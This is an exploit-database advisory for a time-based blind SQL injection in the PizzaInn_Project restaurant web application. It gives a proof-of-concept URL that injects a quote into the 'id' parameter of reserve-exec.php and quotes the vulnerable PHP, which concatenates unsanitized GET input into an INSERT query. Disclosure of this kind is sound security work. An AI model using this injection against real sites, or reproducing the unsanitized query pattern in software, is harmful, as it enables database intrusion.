exploit-db-mirror/exploits/php/webapps/31143.txt

##########################################################################
[+] Exploit: PizzaInn_Project - SQL Injection                            #
[+] Author: vinicius777					                 #
[+] Contact: vinicius777 [AT] gmail  @vinicius777_                       #	                 
[+] Vendor Homepage: http://sourceforge.net/projects/restaurantmis/  	 #
##########################################################################

  
 
[1] Sql Injection Time Based Blind

PoC:  http://127.0.0.1/reserve-exec.php?id=1' [SQL Injection]


Vulnerable Code:
[+] reserve-exec.php


            $id = $_GET['id'];
            $qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
            mysql_query($qry)



#
#
# Greetz to g0tm1lk and TheColonial.